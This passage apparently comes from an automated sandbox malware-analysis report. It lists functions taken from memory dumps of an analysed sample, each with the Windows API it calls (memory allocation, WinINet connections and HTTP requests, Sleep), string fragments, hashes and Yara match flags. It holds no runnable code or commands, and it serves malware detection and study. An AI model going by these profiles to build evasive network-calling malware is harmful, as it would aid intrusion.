                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,004E2D11,00002000,00003000,00000004), ref: 004F83D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: 98671969d55d9fd6660b943f3f55509e3b24c506f75da3d529312c47e5e107e7
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: 9DF015B2200208ABCB14DF89CC81EAB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 049795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: dc89ed33c18e3fc283f5f35c0848319f9634b75cf6809c561a87b49c9f9ed1e5
                                                                    • Instruction ID: d17838c0b5a063b23e3d78b59620d3de5d3a258a2c3d55a31d5e6546837713a2
                                                                    • Opcode Fuzzy Hash: dc89ed33c18e3fc283f5f35c0848319f9634b75cf6809c561a87b49c9f9ed1e5
                                                                    • Instruction Fuzzy Hash: F39002A1202100036105715D8414A16404A97F0245B51C135E1005594DC565D8917165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2dffc15933e4e365b1ea28392817a0d581fead87959c6a1392c8984b0d7da5b3
                                                                    • Instruction ID: 64bfd150ed9437774da4191b3dc0768130bdf2a29fa0e36a4dd3af3275c50373
                                                                    • Opcode Fuzzy Hash: 2dffc15933e4e365b1ea28392817a0d581fead87959c6a1392c8984b0d7da5b3
                                                                    • Instruction Fuzzy Hash: CC900265211100032105B55D4704907008697E5395351C135F1006554CD661D8616161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 049796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: be16bad20e5fc1ebd38b538a6d9969d73438f64636f54906bca5a6407bde39fb
                                                                    • Instruction ID: d0a3a6a6cf73dd7adc09165e5ab03e1f5800e50328b9dc14b6405d16f0648309
                                                                    • Opcode Fuzzy Hash: be16bad20e5fc1ebd38b538a6d9969d73438f64636f54906bca5a6407bde39fb
                                                                    • Instruction Fuzzy Hash: 7090027120110842F100715D8404F46004597F0345F51C12AE0115658D8655D8517561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 049796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4e3ae612edf9ad3085d4903949562cbf0aae04d968e8a5cb06abdcc3399245db
                                                                    • Instruction ID: 90cbee3c76cb36f0b982b24d8c0df4b0b23ff62130821d74c460b6178370596d
                                                                    • Opcode Fuzzy Hash: 4e3ae612edf9ad3085d4903949562cbf0aae04d968e8a5cb06abdcc3399245db
                                                                    • Instruction Fuzzy Hash: 9590027120118802F110715DC404B4A004597E0345F55C525E441565CD86D5D8917161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 87dcb50bce8b161542efe4e60de351addee7597a162dfb4a4fac605c949a147c
                                                                    • Instruction ID: 68c1d09bd9d83fe5123538b975a3995b23f55bcf1d36cd25bf2ddaafd53a07f9
                                                                    • Opcode Fuzzy Hash: 87dcb50bce8b161542efe4e60de351addee7597a162dfb4a4fac605c949a147c
                                                                    • Instruction Fuzzy Hash: 4090027120514842F140715D8404E46005597E0349F51C125E0055698D9665DD55B6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 19ef0d05c6e6c5eaf630cc0feb795805d7ef6064326f9c9a0daaa26862ce6920
                                                                    • Instruction ID: 6a25918d02b57291f7f6d35cfcad1a915e71a6a2f2487475d9a0ecb540a8440e
                                                                    • Opcode Fuzzy Hash: 19ef0d05c6e6c5eaf630cc0feb795805d7ef6064326f9c9a0daaa26862ce6920
                                                                    • Instruction Fuzzy Hash: C890027120110802F180715D8404A4A004597E1345F91C129E0016658DCA55DA5977E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d8f4787e07e7fb27965df63126efe2daab4f2bdb74059aa3bf888753773d264b
                                                                    • Instruction ID: ab884cceb0a7ffb7102dcf9881bf797794d6a994c77fabffa11e7219c2f409ba
                                                                    • Opcode Fuzzy Hash: d8f4787e07e7fb27965df63126efe2daab4f2bdb74059aa3bf888753773d264b
                                                                    • Instruction Fuzzy Hash: E890026921310002F180715D9408A0A004597E1246F91D529E000655CCC955D8696361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3002326393df32ae3b6e8519de5203171aa0f898c37007c7690837fdeeaae593
                                                                    • Instruction ID: f3c21abd3c1c4948ee9dcf4896b147de22d60d69142e7080b134b2045a20dd4d
                                                                    • Opcode Fuzzy Hash: 3002326393df32ae3b6e8519de5203171aa0f898c37007c7690837fdeeaae593
                                                                    • Instruction Fuzzy Hash: 0290027131124402F110715DC404B06004597E1245F51C525E081555CD86D5D8917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8db3e28c5d4b4a5b8b7eeb289fc0f1c4b9ea6695603162385a7394baa9afff41
                                                                    • Instruction ID: def0652aca834ed9fac9f39a3bf441a7b9608db155a1fe4711d9b119e6a6578c
                                                                    • Opcode Fuzzy Hash: 8db3e28c5d4b4a5b8b7eeb289fc0f1c4b9ea6695603162385a7394baa9afff41
                                                                    • Instruction Fuzzy Hash: 1A90027120110402F100759D9408A46004597F0345F51D125E5015559EC6A5D8917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ac6bd2ed34f208f91e02c3368f6ed55605402c28d60acc05f29e5c47f5e6f32b
                                                                    • Instruction ID: d77176a1f726dad3128b703f1999be83beff015e3dedf6ec7ae49ddea31c450a
                                                                    • Opcode Fuzzy Hash: ac6bd2ed34f208f91e02c3368f6ed55605402c28d60acc05f29e5c47f5e6f32b
                                                                    • Instruction Fuzzy Hash: 61900261242141527545B15D84049074046A7F0285791C126E1405954C8566E856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 89a1a2e84caff5907cc4791cd67bfa10bc0846333bdddbd146f21f9aa940a657
                                                                    • Instruction ID: 34b01b60f06435f5db6e12cc14790498a077ba7d417dddb45d64d72ad22df1c4
                                                                    • Opcode Fuzzy Hash: 89a1a2e84caff5907cc4791cd67bfa10bc0846333bdddbd146f21f9aa940a657
                                                                    • Instruction Fuzzy Hash: 4490027120110413F111715D8504B07004997E0285F91C526E041555CD9696D952B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 049799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 15170992d0e2890176ba91048d925dbc78b80e9152fec7d58c474db6e9f5697f
                                                                    • Instruction ID: ab7002c18abbfcd0b280ab049ef9f224e8c7ad025e8e1a9c9394c47c9cb64df4
                                                                    • Opcode Fuzzy Hash: 15170992d0e2890176ba91048d925dbc78b80e9152fec7d58c474db6e9f5697f
                                                                    • Instruction Fuzzy Hash: C59002A134110442F100715D8414F060045D7F1345F51C129E1055558D8659DC527166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4b5fa6c56669382826e81670274b578475212ae81884062bfc09d87215281e3f
                                                                    • Instruction ID: 0a03cfb5d3707bdf8d712ce00f84ee0aa3b6e02caa86d42a6f7d63ecf54d5671
                                                                    • Opcode Fuzzy Hash: 4b5fa6c56669382826e81670274b578475212ae81884062bfc09d87215281e3f
                                                                    • Instruction Fuzzy Hash: 3C9002B120110402F140715D8404B46004597E0345F51C125E5055558E8699DDD576A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04979A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 12a6852be0ef9dcb2b16ff13a2b212a0f37a4c3469dd7e59fea2ef68dcc7105d
                                                                    • Instruction ID: 8ef76914256137b95d60aa9d7905bd7e5f81e4f65fcdf906aa7a83815ba4212d
                                                                    • Opcode Fuzzy Hash: 12a6852be0ef9dcb2b16ff13a2b212a0f37a4c3469dd7e59fea2ef68dcc7105d
                                                                    • Instruction Fuzzy Hash: 7990026121190042F200756D8C14F07004597E0347F51C229E0145558CC955D8616561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F88D0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 004F8938
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                    • API String ID: 1984915467-4016285707
                                                                    • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                    • Instruction ID: eafd09f5eadbfd8746f6bfd62d450440045b691b65707946f3f64c6aa898f935
                                                                    • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                    • Instruction Fuzzy Hash: 4201D7B2905159ABCB04DF99D841DEF7BB9EB48210F158289FE48A7205D674AD108BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F88C7, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 004F8938
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                    • API String ID: 1984915467-4016285707
                                                                    • Opcode ID: cd20c1ec6ac6dfc004e399a1a06bf105c1329df1557b69443426c0de4d170760
                                                                    • Instruction ID: 7c97aa21ef8fcc4d1e98d2572bba5388332a694caa2fd38dead9808d4a607027
                                                                    • Opcode Fuzzy Hash: cd20c1ec6ac6dfc004e399a1a06bf105c1329df1557b69443426c0de4d170760
                                                                    • Instruction Fuzzy Hash: E901D7B2904159ABCB04DF98D981DFF7BB9AF48310F158288BE59AB305D674ED108BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8950, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 004F89AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpRequestSend
                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                    • API String ID: 360639707-2503632690
                                                                    • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                    • Instruction ID: a2feaf66b233dd8b4be299979600ae983f822f6f777c78018ab4b35fd6da4b25
                                                                    • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                    • Instruction Fuzzy Hash: FD014FB2905119AFCB00DF98D8419BF7BB8EB54210F108189FD18AB304D670EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8850, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 004F88B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                    • API String ID: 3050416762-1024195942
                                                                    • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                    • Instruction ID: afeb59839182ffc8112e4f5906c89f7ceb84baa40fca1390395cf091123e512e
                                                                    • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                    • Instruction Fuzzy Hash: 3701E9B2905118AFCB14DF99D941EEF77B9EB88310F154289BE08A7241D634EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F884E, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 43networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 004F88B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                    • API String ID: 3050416762-1024195942
                                                                    • Opcode ID: c6c19d4d08ed617b56480f3cf5f831c75074d31f09af6e6672db6f5458ba1ffc
                                                                    • Instruction ID: d479250f4eb532bb386671aab89925b8f142bfccec75016ac01fd0e314c5fc72
                                                                    • Opcode Fuzzy Hash: c6c19d4d08ed617b56480f3cf5f831c75074d31f09af6e6672db6f5458ba1ffc
                                                                    • Instruction Fuzzy Hash: E301E9B2905118AFCB04DF89D941EEF77B9EF88310F158149BE08A7241D630EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8777, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 53networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 004F8837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                    • API String ID: 2038078732-3155091674
                                                                    • Opcode ID: 4a0147fd85e37eb0357ccaa6ad9a50b303463d042e6697e4fcf798e7407af59b
                                                                    • Instruction ID: 0359d46eff618d45cdb119e6547a448240b851e3cc748f8bf6382614ec950ca9
                                                                    • Opcode Fuzzy Hash: 4a0147fd85e37eb0357ccaa6ad9a50b303463d042e6697e4fcf798e7407af59b
                                                                    • Instruction Fuzzy Hash: 8B118EB6601218AFDB10DF95D841DEB7BA8EF44350B14858EFE189B341C634AD10CBE4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F87E0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 004F8837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                    • API String ID: 2038078732-3155091674
                                                                    • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                    • Instruction ID: 7f6d28a3b2e6f3da5fcd065666d639269ef3897af93be6ab9d21a871bd139a5e
                                                                    • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                    • Instruction Fuzzy Hash: 14F019B2901118AF8B14DF99DC419FBB7B8FF48350B04858EBE189B301D634AE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 004F6F88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 0fe21062c5f4706547e9c7e70a88f12e7dd98cdb67c63e4f20b13f5beffc9784
                                                                    • Instruction ID: ae3cc0daac908cbfbfd37e2dec340069f3ced7d4803c88311aa4e89da2fea357
                                                                    • Opcode Fuzzy Hash: 0fe21062c5f4706547e9c7e70a88f12e7dd98cdb67c63e4f20b13f5beffc9784
                                                                    • Instruction Fuzzy Hash: 3331B0B1601308ABC715DF69D8A1FA7B7B8FB48704F00851EF61A9B241D734B945CBB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F6EDE, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 77sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 004F6F88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 6e28cb3ec7e82ba46dd38160ae91fd3feda8ade53243b084ce4b0481bf7fb60a
                                                                    • Instruction ID: 4e552cdf065550c8cb1a883aa0ee8d56165e64a66e9cb6d6267c85aad6b61bba
                                                                    • Opcode Fuzzy Hash: 6e28cb3ec7e82ba46dd38160ae91fd3feda8ade53243b084ce4b0481bf7fb60a
                                                                    • Instruction Fuzzy Hash: DF21A3B1601304ABC714DF65D8A1F6BB7B4FF48704F10811EF61D9B281D774A945CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F84C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,004E3B93), ref: 004F84FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 1982acd4505fd0bca37715fa278969a94f8f2e38393a1c78d121d2b941534597
                                                                    • Instruction ID: 4890b23c32072f90edc4b4576503e0c4bc2d122094b5cca9c1f6b0eb33060d6f
                                                                    • Opcode Fuzzy Hash: 1982acd4505fd0bca37715fa278969a94f8f2e38393a1c78d121d2b941534597
                                                                    • Instruction Fuzzy Hash: 30F0A0712007056FCB15DF68CC48EA77B59AF55220F044798FA685B3D2CA30E811C7E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,004E3B93), ref: 004F84FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: 1e5d3376ede50a698b79f57be117281ebb3081d2f9102d04ae1db208b009c8f9
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
